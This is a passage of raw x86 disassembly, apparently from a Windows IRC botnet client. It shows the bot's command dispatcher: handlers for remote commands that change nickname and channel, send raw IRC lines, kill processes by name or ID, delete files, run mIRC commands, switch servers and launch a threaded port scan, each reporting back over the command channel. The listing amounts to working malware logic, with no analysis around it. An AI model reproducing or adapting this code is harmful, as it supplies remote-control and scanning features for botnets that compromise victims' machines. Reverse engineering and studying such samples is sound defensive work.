loc_40D687: ; CODE XREF: sub_40ABFE+2A39�j
; sub_40ABFE+2A85�j
cmp [ebp+var_BB4], 0
jnz short loc_40D6DE
push offset a_n_z_m_Root__0 ; ".n.z.m. (root.p.l.g) .. Failed to st"...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
cmp [ebp+var_4], 0
jnz short loc_40D6C9
push 0
push [ebp+var_85C]
lea eax, [ebp+Dst]
push eax
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
loc_40D6C9: ; CODE XREF: sub_40ABFE+2AA9�j
lea eax, [ebp+Dst]
push eax
call sub_40913D
pop ecx
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40D6DE: ; CODE XREF: sub_40ABFE+2A90�j
mov [ebp+var_CDC], 10h
lea eax, [ebp+var_CDC]
push eax
lea eax, [ebp+var_CD8]
push eax
push [ebp+s]
call dword_4263D4 ; getsockname
movzx eax, [ebp+var_373]
neg eax
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
mov ecx, [ebp+Count]
and ecx, eax
mov [ebp+Count], ecx
push 10h
push [ebp+Count] ; Count
call dword_4264AC ; inet_ntoa
push eax ; Source
lea eax, [ebp+var_CC8]
push eax ; Dest
call _strncpy
add esp, 0Ch
movzx eax, [ebp+var_373]
neg eax
sbb eax, eax
neg eax
inc eax
inc eax
mov [ebp+var_B7C], eax
push 30h ; Ch
lea eax, [ebp+var_CC8]
push eax ; Str
call _strrchr
pop ecx
pop ecx
mov [ebp+var_B74], eax
and [ebp+var_B78], 0
jmp short loc_40D7A0
; ---------------------------------------------------------------------------
loc_40D773: ; CODE XREF: sub_40ABFE+2BBA�j
mov eax, [ebp+var_B74]
mov byte ptr [eax], 78h
push 30h ; Ch
lea eax, [ebp+var_CC8]
push eax ; Str
call _strrchr
pop ecx
pop ecx
mov [ebp+var_B74], eax
mov al, [ebp+var_B78]
add al, 1
mov [ebp+var_B78], al
loc_40D7A0: ; CODE XREF: sub_40ABFE+2B73�j
movsx eax, [ebp+var_B78]
cmp eax, [ebp+var_B7C]
jge short loc_40D7BA
cmp [ebp+var_B74], 0
jz short loc_40D7BA
jmp short loc_40D773
; ---------------------------------------------------------------------------
loc_40D7BA: ; CODE XREF: sub_40ABFE+2BAF�j
; sub_40ABFE+2BB8�j
mov [ebp+var_B88], 1
mov eax, [ebp+s]
mov [ebp+var_BB8], eax
mov eax, [ebp+var_85C]
mov [ebp+var_B90], eax
mov eax, [ebp+var_4]
mov [ebp+var_B8C], eax
push dword ptr [ebp+var_98] ; Format
push 80h ; Count
lea eax, [ebp+var_CB8]
push eax ; Dest
call __snprintf
add esp, 0Ch
push offset byte_470264 ; Str2
push offset aExp_1 ; "#!exp!#"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40D82C
push offset aExp_1 ; "#!exp!#"
push 80h ; Count
lea eax, [ebp+var_C38]
push eax ; Dest
call __snprintf
add esp, 0Ch
jmp short loc_40D833
; ---------------------------------------------------------------------------
loc_40D82C: ; CODE XREF: sub_40ABFE+2C11�j
and [ebp+var_C38], 0
loc_40D833: ; CODE XREF: sub_40ABFE+2C2C�j
cmp [ebp+var_B88], 0
jz short loc_40D848
mov [ebp+var_1940], offset aRandom ; "Random"
jmp short loc_40D852
; ---------------------------------------------------------------------------
loc_40D848: ; CODE XREF: sub_40ABFE+2C3C�j
mov [ebp+var_1940], offset aSequential ; "Sequential"
loc_40D852: ; CODE XREF: sub_40ABFE+2C48�j
push [ebp+var_B9C]
push [ebp+var_BAC]
push [ebp+var_BB0]
push [ebp+var_BB4]
lea eax, [ebp+var_CC8]
push eax
push [ebp+var_1940]
push offset a_n_z_m_Root__1 ; ".n.z.m. (root.p.l.g) .. %s Port Scan"...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 20h
push 0 ; int
push 8 ; int
lea eax, [ebp+Dst]
push eax ; Source
call sub_410231
add esp, 0Ch
mov [ebp+var_BA8], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push 0 ; dwCreationFlags
lea eax, [ebp+var_CC8]
push eax ; lpParameter
push offset sub_405A2E ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
mov ecx, [ebp+var_BA8]
imul ecx, 234h
mov dword_42B554[ecx], eax
mov eax, [ebp+var_BA8]
imul eax, 234h
cmp dword_42B554[eax], 0
jz short loc_40D8FF
loc_40D8EA: ; CODE XREF: sub_40ABFE+2CFD�j
cmp [ebp+var_B84], 0
jnz short loc_40D8FD
push 32h ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_40D8EA
; ---------------------------------------------------------------------------
loc_40D8FD: ; CODE XREF: sub_40ABFE+2CF3�j
jmp short loc_40D91A
; ---------------------------------------------------------------------------
loc_40D8FF: ; CODE XREF: sub_40ABFE+2CEA�j
call ds:GetLastError
push eax
push offset a_n_z_m_Root__2 ; ".n.z.m. (root.p.l.g) .. Failed to st"...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40D91A: ; CODE XREF: sub_40ABFE:loc_40D8FD�j
cmp [ebp+var_4], 0
jnz short loc_40D940
push 0
push [ebp+var_85C]
lea eax, [ebp+Dst]
push eax
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
loc_40D940: ; CODE XREF: sub_40ABFE+2D20�j
lea eax, [ebp+Dst]
push eax
call sub_40913D
pop ecx
loc_40D94D: ; CODE XREF: sub_40ABFE+2962�j
jmp loc_40D4D7
; ---------------------------------------------------------------------------
loc_40D952: ; CODE XREF: sub_40ABFE+28F8�j
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40D95A: ; CODE XREF: sub_40ABFE+289E�j
mov eax, [ebp+var_BC]
cmp [ebp+eax*4+lpFileName], 0
jnz short loc_40D972
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40D972: ; CODE XREF: sub_40ABFE+2D6A�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_nick ; "irc.nick"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40D9AC
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_n ; "irc.n"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40D9EA
loc_40D9AC: ; CODE XREF: sub_40ABFE+2D8F�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; char
push offset aNickS_1 ; "NICK %s\r\n"
push [ebp+s] ; int
call sub_40A03C
add esp, 0Ch
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; char
push offset dword_422D80 ; Format
call sub_4091D3
pop ecx
pop ecx
mov eax, [ebp+arg_24]
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40D9EA: ; CODE XREF: sub_40ABFE+2DAC�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_join ; "irc.join"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40DA24
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_j ; "irc.j"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40DA6F
loc_40DA24: ; CODE XREF: sub_40ABFE+2E07�j
mov eax, [ebp+var_BC]
push dword ptr [ebp+eax*4+var_98]
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; char
push offset aJoinSS_2 ; "JOIN %s %s\r\n"
push [ebp+s] ; int
call sub_40A03C
add esp, 10h
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; char
push offset dword_422DD8 ; Format
call sub_4091D3
pop ecx
pop ecx
mov eax, [ebp+arg_24]
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40DA6F: ; CODE XREF: sub_40ABFE+2E24�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_part ; "irc.part"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40DAA9
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_pt ; "irc.pt"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40DAE7
loc_40DAA9: ; CODE XREF: sub_40ABFE+2E8C�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; char
push offset aPartS ; "PART %s\r\n"
push [ebp+s] ; int
call sub_40A03C
add esp, 0Ch
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; char
push offset dword_422E28 ; Format
call sub_4091D3
pop ecx
pop ecx
mov eax, [ebp+arg_24]
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40DAE7: ; CODE XREF: sub_40ABFE+2EA9�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_raw ; "irc.raw"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40DB21
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_ra ; "irc.ra"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40DB83
loc_40DB21: ; CODE XREF: sub_40ABFE+2F04�j
cmp [ebp+var_2D4], 0
jz short loc_40DB7B
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; SubStr
push [ebp+var_2D4] ; Str
call _strstr
pop ecx
pop ecx
mov dword ptr [ebp+var_CE0], eax
cmp dword ptr [ebp+var_CE0], 0
jz short loc_40DB7B
push dword ptr [ebp+var_CE0] ; char
push offset aS_2 ; "%s\r\n"
push [ebp+s] ; int
call sub_40A03C
add esp, 0Ch
push dword ptr [ebp+var_CE0] ; char
push offset dword_422E70 ; Format
call sub_4091D3
pop ecx
pop ecx
loc_40DB7B: ; CODE XREF: sub_40ABFE+2F2A�j
; sub_40ABFE+2F53�j
mov eax, [ebp+arg_24]
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40DB83: ; CODE XREF: sub_40ABFE+2F21�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aThreads_kill ; "threads.kill"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40DBC1
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aThreads_k ; "threads.k"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40DD39
loc_40DBC1: ; CODE XREF: sub_40ABFE+2FA0�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; Str2
push offset aAll ; "all"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40DC59
call sub_41050C
mov [ebp+var_5D8], eax
cmp [ebp+var_5D8], 0
jle short loc_40DC0E
push [ebp+var_5D8]
push offset dword_422EB8 ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp short loc_40DC21
; ---------------------------------------------------------------------------
loc_40DC0E: ; CODE XREF: sub_40ABFE+2FF2�j
push offset dword_422EF0 ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_40DC21: ; CODE XREF: sub_40ABFE+300E�j
cmp [ebp+var_4], 0
jnz short loc_40DC47
push 0
push [ebp+var_85C]
lea eax, [ebp+Dst]
push eax
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
loc_40DC47: ; CODE XREF: sub_40ABFE+3027�j
lea eax, [ebp+Dst]
push eax
call sub_40913D
pop ecx
jmp loc_40DD31
; ---------------------------------------------------------------------------
loc_40DC59: ; CODE XREF: sub_40ABFE+2FDE�j
mov eax, [ebp+var_BC]
inc eax
mov [ebp+var_5D8], eax
jmp short loc_40DC75
; ---------------------------------------------------------------------------
loc_40DC68: ; CODE XREF: sub_40ABFE+312E�j
mov eax, [ebp+var_5D8]
inc eax
mov [ebp+var_5D8], eax
loc_40DC75: ; CODE XREF: sub_40ABFE+3068�j
cmp [ebp+var_5D8], 20h
jnb loc_40DD31
mov eax, [ebp+var_5D8]
cmp [ebp+eax*4+Str2], 0
jnz short loc_40DC97
jmp loc_40DD31
; ---------------------------------------------------------------------------
loc_40DC97: ; CODE XREF: sub_40ABFE+3092�j
mov eax, [ebp+var_5D8]
push [ebp+eax*4+Str2] ; Str
call _atoi
pop ecx
push eax
call sub_4103E7
pop ecx
test eax, eax
jz short loc_40DCD8
mov eax, [ebp+var_5D8]
push [ebp+eax*4+Str2]
push offset dword_422F28 ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp short loc_40DCF9
; ---------------------------------------------------------------------------
loc_40DCD8: ; CODE XREF: sub_40ABFE+30B5�j
mov eax, [ebp+var_5D8]
push [ebp+eax*4+Str2]
push offset dword_422F5C ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40DCF9: ; CODE XREF: sub_40ABFE+30D8�j
cmp [ebp+var_4], 0
jnz short loc_40DD1F
push 0
push [ebp+var_85C]
lea eax, [ebp+Dst]
push eax
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
loc_40DD1F: ; CODE XREF: sub_40ABFE+30FF�j
lea eax, [ebp+Dst]
push eax
call sub_40913D
pop ecx
jmp loc_40DC68
; ---------------------------------------------------------------------------
loc_40DD31: ; CODE XREF: sub_40ABFE+3056�j
; sub_40ABFE+307E�j ...
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40DD39: ; CODE XREF: sub_40ABFE+2FBD�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_setserve ; "irc.setserve"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40DD73
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_se ; "irc.se"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40DDE9
loc_40DD73: ; CODE XREF: sub_40ABFE+3156�j
push 7Fh ; Count
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; Source
push [ebp+arg_14] ; Dest
call _strncpy
add esp, 0Ch
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName]
push offset dword_422FB0 ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_4], 0
jnz short loc_40DDD4
push 0
push [ebp+var_85C]
lea eax, [ebp+Dst]
push eax
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
loc_40DDD4: ; CODE XREF: sub_40ABFE+31B4�j
lea eax, [ebp+Dst]
push eax
call sub_40913D
pop ecx
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40DDE9: ; CODE XREF: sub_40ABFE+3173�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aCom_killprocna ; "com.killprocname"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40DE27
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aCom_kpn ; "com.kpn"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40DECF
loc_40DE27: ; CODE XREF: sub_40ABFE+3206�j
push 0 ; int
push 0 ; int
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; Str2
push [ebp+var_85C] ; int
push 0 ; int
push [ebp+s] ; int
call sub_40F5A7
add esp, 18h
cmp eax, 1
jnz short loc_40DE73
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName]
push offset unk_423000 ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp short loc_40DE94
; ---------------------------------------------------------------------------
loc_40DE73: ; CODE XREF: sub_40ABFE+3250�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName]
push offset unk_423034 ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40DE94: ; CODE XREF: sub_40ABFE+3273�j
cmp [ebp+var_4], 0
jnz short loc_40DEBA
push 0
push [ebp+var_85C]
lea eax, [ebp+Dst]
push eax
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
loc_40DEBA: ; CODE XREF: sub_40ABFE+329A�j
lea eax, [ebp+Dst]
push eax
call sub_40913D
pop ecx
mov eax, [ebp+arg_24]
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40DECF: ; CODE XREF: sub_40ABFE+3223�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aCom_prockillid ; "com.prockillid"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40DF0D
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aCom_pkid ; "com.pkid"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40DFAB
loc_40DF0D: ; CODE XREF: sub_40ABFE+32EC�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; Str
call _atoi
pop ecx
push eax ; dwProcessId
call sub_40F8C5
pop ecx
cmp eax, 1
jnz short loc_40DF4F
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName]
push offset unk_423090 ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp short loc_40DF70
; ---------------------------------------------------------------------------
loc_40DF4F: ; CODE XREF: sub_40ABFE+332C�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName]
push offset unk_4230C8 ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40DF70: ; CODE XREF: sub_40ABFE+334F�j
cmp [ebp+var_4], 0
jnz short loc_40DF96
push 0
push [ebp+var_85C]
lea eax, [ebp+Dst]
push eax
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
loc_40DF96: ; CODE XREF: sub_40ABFE+3376�j
lea eax, [ebp+Dst]
push eax
call sub_40913D
pop ecx
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40DFAB: ; CODE XREF: sub_40ABFE+3309�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aCom_delete ; "com.delete"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40DFE9
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aCom_del ; "com.del"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40E083
loc_40DFE9: ; CODE XREF: sub_40ABFE+33C8�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; lpFileName
call ds:DeleteFileA ; DeleteFileA
test eax, eax
jz short loc_40E028
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName]
push offset dword_423120 ; Format
push 200h ; Count
lea eax, [ebp+Dst]
push eax ; Dest
call __snprintf
add esp, 10h
jmp short loc_40E048
; ---------------------------------------------------------------------------
loc_40E028: ; CODE XREF: sub_40ABFE+3400�j
push offset dword_42314C
call sub_40834A
pop ecx
push eax ; Format
push 200h ; Count
lea eax, [ebp+Dst]
push eax ; Dest
call __snprintf
add esp, 0Ch
loc_40E048: ; CODE XREF: sub_40ABFE+3428�j
cmp [ebp+var_4], 0
jnz short loc_40E06E
push 0
push [ebp+var_85C]
lea eax, [ebp+Dst]
push eax
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
loc_40E06E: ; CODE XREF: sub_40ABFE+344E�j
lea eax, [ebp+Dst]
push eax
call sub_40913D
pop ecx
mov eax, [ebp+arg_24]
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40E083: ; CODE XREF: sub_40ABFE+33E5�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aMirc_cmd ; "mirc.cmd"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40E0C1
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aMirc_cmd_0 ; "mirc.cmd"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40E16A
loc_40E0C1: ; CODE XREF: sub_40ABFE+34A0�j
cmp [ebp+var_2D4], 0
jz loc_40E162
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; SubStr
push [ebp+var_2D4] ; Str
call _strstr
pop ecx
pop ecx
mov [ebp+var_CE4], eax
cmp [ebp+var_CE4], 0
jz short loc_40E162
push [ebp+var_CE4] ; Format
call sub_40840B
pop ecx
test eax, eax
jnz short loc_40E11C
push offset unk_423180 ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp short loc_40E12F
; ---------------------------------------------------------------------------
loc_40E11C: ; CODE XREF: sub_40ABFE+3507�j
push offset dword_4231AC ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_40E12F: ; CODE XREF: sub_40ABFE+351C�j
cmp [ebp+var_4], 0
jnz short loc_40E155
push 0
push [ebp+var_85C]
lea eax, [ebp+Dst]
push eax
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
loc_40E155: ; CODE XREF: sub_40ABFE+3535�j
lea eax, [ebp+Dst]
push eax
call sub_40913D
pop ecx
loc_40E162: ; CODE XREF: sub_40ABFE+34CA�j
; sub_40ABFE+34F7�j
mov eax, [ebp+arg_24]
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40E16A: ; CODE XREF: sub_40ABFE+34BD�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_gethost ; "irc.gethost"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40E1A8
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_gh ; "irc.gh"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40E2F6
loc_40E1A8: ; CODE XREF: sub_40ABFE+3587�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; SubStr
push [ebp+arg_1C] ; Str
call _strstr
pop ecx
pop ecx
test eax, eax
jz loc_40E2EE
mov eax, [ebp+var_BC]
cmp dword ptr [ebp+eax*4+var_98], 0
jz loc_40E28C
mov eax, [ebp+var_BC]
push dword ptr [ebp+eax*4+var_98] ; SubStr
push [ebp+var_2D4] ; Str
call _strstr
pop ecx
pop ecx
mov [ebp+var_CE8], eax
cmp [ebp+var_CE8], 0
jz short loc_40E277
push [ebp+var_CE8]
push dword ptr [ebp+var_98]
push [ebp+lpFileName]
push [ebp+Str2]
push offset aSSSS ; "%s %s %s :%s"
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 18h
push 1FFh ; Count
lea eax, [ebp+Dst]
push eax ; Source
push [ebp+Src] ; Dest
call _strncpy
add esp, 0Ch
push [ebp+var_CE8]
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName]
push offset dword_4231FC ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 10h
mov eax, [ebp+arg_24]
inc eax
mov [ebp+arg_24], eax
jmp short loc_40E28A
; ---------------------------------------------------------------------------
loc_40E277: ; CODE XREF: sub_40ABFE+3604�j
push offset dword_423230 ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_40E28A: ; CODE XREF: sub_40ABFE+3677�j
jmp short loc_40E2E1
; ---------------------------------------------------------------------------
loc_40E28C: ; CODE XREF: sub_40ABFE+35D7�j
push 0
push [ebp+var_85C]
push [ebp+s]
push [ebp+arg_1C]
lea eax, [ebp+Dst]
push eax
call sub_408EF7
add esp, 0Ch
push eax
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName]
push offset dword_423270 ; Format
push 200h ; Count
lea eax, [ebp+Dst]
push eax ; Dest
call __snprintf
add esp, 10h
loc_40E2E1: ; CODE XREF: sub_40ABFE:loc_40E28A�j
lea eax, [ebp+Dst]
push eax
call sub_40913D
pop ecx
loc_40E2EE: ; CODE XREF: sub_40ABFE+35C3�j
mov eax, [ebp+arg_24]
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40E2F6: ; CODE XREF: sub_40ABFE+35A4�j
mov eax, [ebp+var_BC]
cmp dword ptr [ebp+eax*4+var_98], 0
jnz short loc_40E30E
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40E30E: ; CODE XREF: sub_40ABFE+3706�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_privmsg ; "irc.privmsg"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40E34C
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_pm ; "irc.pm"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40E404
loc_40E34C: ; CODE XREF: sub_40ABFE+372B�j
cmp [ebp+var_2D4], 0
jz loc_40E3FC
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str
call _strlen
pop ecx
mov esi, [ebp+var_2D4]
add esi, eax
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; Str
call _strlen
pop ecx
lea eax, [esi+eax+2]
mov [ebp+var_2D4], eax
mov eax, [ebp+var_BC]
push dword ptr [ebp+eax*4+var_98] ; SubStr
push [ebp+var_2D4] ; Str
call _strstr
pop ecx
pop ecx
mov [ebp+var_CEC], eax
cmp [ebp+var_CEC], 0
jz short loc_40E3FC
push 0
push 0
push [ebp+var_CEC]
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName]
push [ebp+s]
call sub_40A08D
add esp, 14h
push [ebp+var_CEC]
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; char
push offset dword_4232AC ; Format
call sub_4091D3
add esp, 0Ch
loc_40E3FC: ; CODE XREF: sub_40ABFE+3755�j
; sub_40ABFE+37BA�j
mov eax, [ebp+arg_24]
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40E404: ; CODE XREF: sub_40ABFE+3748�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_action ; "irc.action"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40E442
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_ac ; "irc.ac"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40E515
loc_40E442: ; CODE XREF: sub_40ABFE+3821�j
cmp [ebp+var_2D4], 0
jz loc_40E50D
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str
call _strlen
pop ecx
mov esi, [ebp+var_2D4]
add esi, eax
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; Str
call _strlen
pop ecx
lea eax, [esi+eax+2]
mov [ebp+var_2D4], eax
mov eax, [ebp+var_BC]
push dword ptr [ebp+eax*4+var_98] ; SubStr
push [ebp+var_2D4] ; Str
call _strstr
pop ecx
pop ecx
mov [ebp+var_CF0], eax
cmp [ebp+var_CF0], 0
jz short loc_40E50D
push [ebp+var_CF0]
push offset dword_4232EC ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
push 0
push 0
lea eax, [ebp+Dst]
push eax
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName]
push [ebp+s]
call sub_40A08D
add esp, 14h
push [ebp+var_CF0]
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; char
push offset dword_4232F8 ; Format
call sub_4091D3
add esp, 0Ch
loc_40E50D: ; CODE XREF: sub_40ABFE+384B�j
; sub_40ABFE+38B0�j
mov eax, [ebp+arg_24]
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40E515: ; CODE XREF: sub_40ABFE+383E�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_cycle ; "irc.cycle"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40E553
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_cy ; "irc.cy"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40E5EB
loc_40E553: ; CODE XREF: sub_40ABFE+3932�j
push [ebp+lpFileName] ; Str2
push offset a332_1 ; "332"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40E571
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40E571: ; CODE XREF: sub_40ABFE+3969�j
mov eax, [ebp+var_BC]
push dword ptr [ebp+eax*4+var_98] ; char
push offset aPartS_0 ; "PART %s\r\n"
push [ebp+s] ; int
call sub_40A03C
add esp, 0Ch
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; Str
call _atoi
pop ecx
imul eax, 3E8h
push eax ; dwMilliseconds
call ds:Sleep ; Sleep
mov eax, [ebp+var_BC]
push [ebp+eax*4+var_94]
mov eax, [ebp+var_BC]
push dword ptr [ebp+eax*4+var_98] ; char
push offset aJoinSS_3 ; "JOIN %s %s\r\n"
push [ebp+s] ; int
call sub_40A03C
add esp, 10h
push offset dword_423358
call sub_40913D
pop ecx
mov eax, [ebp+arg_24]
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40E5EB: ; CODE XREF: sub_40ABFE+394F�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_mode ; "irc.mode"
call _strcmp
pop ecx
pop ecx
